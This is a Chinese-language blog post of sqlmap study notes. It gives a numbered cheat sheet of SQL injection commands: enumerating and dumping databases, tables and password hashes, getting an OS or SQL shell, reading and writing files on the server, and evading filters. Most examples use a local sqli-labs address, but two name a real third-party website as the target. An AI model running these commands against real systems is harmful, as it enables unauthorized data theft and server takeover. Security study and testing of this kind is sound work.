sqlmap学习

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量832 收藏 14
点赞数 19
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010873950/article/details/125971189
版权

1.使用命令:

python sqlmap.py -u "url" --dbs #查看所有数据库名称

python sqlmap.py -u "url" --current-db --batch  #查看当前数据库的名称,--batch:需要选择的选项使用默认项

  1. sqlmap -u "https://www.panohire.com/index.php?g=portal&m=page&a=news&id=25" --dbms=mysql -p id ----current-db --batch

  2. sqlmap -r http.txt #http.txt是我们抓取的http的请求包

  3. sqlmap.py -u “https://www.panohire.com/index.php?g=portal&m=page&a=news&id=25*” --current-db --batch #查看当前数据库名称,--batch表示一切需要选择的选项均使用默认选项

  4. sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测

  5. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" #探测该url是否存在漏洞

  6. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie= "抓取的cookie" #当该网站需要登录时,探测该url是否存在漏洞

  7. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --data= "uname=admin&passwd=admin&submit=Submit" #抓取其post提交的数据填入

  8. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users #查看数据库的所有用户

  9. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #查看数据库用户名的密码

  10. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user #查看数据库当前的用户

  11. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba #判断当前用户是否有管理员权限

  12. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles #列出数据库所有管理员角色

  14. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs #爆出所有的数据库

  15. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tables #爆出所有的数据表

  16. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --columns #爆出数据库中所有的列

  17. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #查看当前的数据库

  18. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #爆出数据库security中的所有的表

  19. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns #爆出security数据库中users表中的所有的列

  20. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username -- dump #爆出数据库security中的users表中的username列中的所有数据

  21. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -- dump-all #爆出数据库security中的users表中的所有数据

  22. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -- dump-all #爆出数据库security中的所有数据

  23. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -- dump-all #爆出该数据库中的所有数据

  24. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tamper=space2comment.py #指定脚本进行过滤,用/**/代替空格

  25. sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level= 5 --risk= 3 #探测等级5,平台危险等级3,都是最高级别

  26. sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell #执行指定的sql语句

  27. sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell #执行--os-shell命令

  28. sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file- read "c:/test.txt" #读取目标服务器C盘下的test.txt文件

  29. sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file- write test.txt --file-dest "e:/hack.txt" #将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txt

  30. sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --dbms= "MySQL" #指定其数据库为mysql Firebird, HSQLDB, IBM DB2, Informix, Microsoft Access, Microsoft SQL Server, MySQL, Oracle, PostgreSQL, SAP MaxDB, SQLite, Sybase

  31. sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --random-agent #使用任意的User-Agent爆破

  32. sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --proxy= "127.0.0.1:8080" #指定代理

  33. sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --technique T #指定时间延迟注入

  34. -v3 输出详细度 最大值 5 会显示请求包和回复包

  35. --threads 5 指定线程数

  36. --fresh-queries 清除缓存

  37. --flush-session 刷新session

  38. --batch 对所有的交互式的都是默认的

  39. --random-agent 任意的http头

  40. --tamper base64encode 对提交的数据进行base64编码

  41. --keep-alive 保持连接,当出现 [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request( s) 保错的时候,使用这个参数

  42. --technique=BE 这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式,当然,我们也可以直接手工指定。

     支持的探测方式如下:

  • B: Boolean-based blind SQL injection(布尔型注入)
  • E: Error-based SQL injection(报错型注入)
  • U: UNION query SQL injection(可联合查询注入)
  • S: Stacked queries SQL injection(可多语句查询注入)
  • T: Time-based blind SQL injection(基于时间延迟注入)

杨杨杨阳
关注
  • 19
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap学习笔记
Zasen_的博客
06-05 514
ps:学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3.基于报错注入,即页面会返回错误信息,或者把注入的...
sqlmap学习思维导图
02-07
sqlmap学习思维导图,含基础知识及sql注入流程介绍及实例。
SQLmap学习笔记
weixin_51031096的博客
03-12 296
sqlmap学习笔记,有基础sqlmap探测流程
SQLMap 学习
diaolapei9880的博客
02-10 124
注入完整流程:http://mp.weixin.qq.com/s/G_DUUVuPH9DeWagjELCPfA sqlmap命令:http://www.cnblogs.com/handt/p/855fc3559d82e3f133a0bc314bfedc29.html sqlmap安装:http://jingyan.baidu.com/article/60ccbceb64cc2064c...
Sqlmap学习
k0sec的安全路
05-03 1725
Sqlmap 安装环境 Sqlmap 下载 Sqlmap 版本查看 python sqlmap.py --version Sqlmap 高级帮助命令 python sqlmap.py -hh sqlmap 直连数据库 服务型数据库(前提知道数据库用户名和密码): DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME(MySQL,Oracle...
SQLMAP学习
mmxhappy的专栏
01-25 475
SQLMap介绍SQLMap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url(域名)的SQL注入漏洞。SQLMap支持的数据库有MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。相对于手工注入,sqlmap的高效注入大大提高了我们渗透效率。
SQLmap学习以及题解运用
Z11762的博客
05-21 1001
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。这里主要分为四大部分目标脱库账号与其它,sqlmap是一款自动化的sql注入工具,下面我用的是kali自带的sqlmap工具首先需要打开虚拟机终端,输入命令sqlmap,如果出现以下界面就说明工具可以使用。
Sqlmap学习精讲
永不垂头的博客
08-04 121
学习笔记—Sqlmap学习 Sqlmap学习: 一、 在虚拟机中安装sqlmap Sqlmap使用: Sqlmap做成快捷方式 右键桌面创建快捷方式,对象位置填写cmd,点击下一步 命名为sqlmap,点击完成 右键此快捷方式,起始位置改为sqlmap所在目录,点击应用后确认: 双击sqlmap.py -h 用自身的字典跑出密码: Sqlmap讲解: www.target1.com/vuln1.php?1=foobar www
SQLMAP学习使用
ppbgi的博客
03-16 270
一、sqlmap简介 sqlmap的强大之处是在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并存在获取完全的操作权限时执行任意命令,支持以下独特的注入: 基于布尔类型的注入,可以根据返回页面判断条件判断真假的注入; 基于时间的盲注,利用时间线判断来判断条件的真假; 基于报错的注入,页面会返回错误信息,或者把注入的语句返回到页面中; 联合查询注入,使用union的请求进行注入; 堆叠注入,同时执行多条语句进行注入 二、sqlmap基础使用 注入判断: sqlmap.py -u +ur
SQLMap 学习之路
VVzv的博客
05-14 342
SQL注入至sqlmap简易用法
sqlmap.zip
10-31
7. **防护与缓解**:尽管SQLMap是攻击工具,但它也为安全专业人员提供了学习防御策略的机会。了解攻击手段,可以帮助我们更好地保护系统,例如通过输入验证、参数化查询、使用ORM框架等方法减少SQL注入风险。 2019...
sqlmap1.2安装包
11-13
**SQLMap介绍** SQLMap是一款开源的自动化SQL注入工具,专为渗透测试人员设计,用于检测和利用SQL注入漏洞。它的强大在于能够自动识别多种数据库管理系统(如MySQL、...不断学习和提高,才能在这个领域走得更远。
sqlmap源码
11-30
深入研究sqlmap的源码,开发者不仅可以学习到SQL注入攻击的技巧,还能了解到如何编写安全的代码,防止自己的应用程序遭受此类攻击。同时,源码分析有助于提升对HTTP协议、数据库交互和Web安全的理解。 源码中的`...
sqlmap自动扫描工具
06-14
- 学习和理解SQL注入的原理和防护措施,以便更好地防止这类攻击。 综上所述,SQLMap是一个强大的自动化工具,能够有效地帮助安全专业人员检测和利用SQL注入漏洞。正确使用它可以提升网站的安全性,但同时也应遵循...
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 768
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
urhero的专栏
07-25 267
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子中,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子中,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
Spring Security学习笔记(二)Spring Security认证和鉴权
飞!!!的博客
07-24 686
用户认证的基础Filter,只有UsernamePasswordAuthenticationFilter这一个实现类。...//主要方法//先校验请求url与表单校验提交的url是否一致,不一致执行下一个Filter//一致的话就执行认证逻辑,一般默认的表单提交url是"/login"if (!} else {try {//实现类执行具体的认证逻辑return;//由子类实现具体的验证逻辑...
FastAPI(八十)实战开发《在线课程学习系统》接口开发-- 课程列表
mr~li的博客
07-25 245
源码见:"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值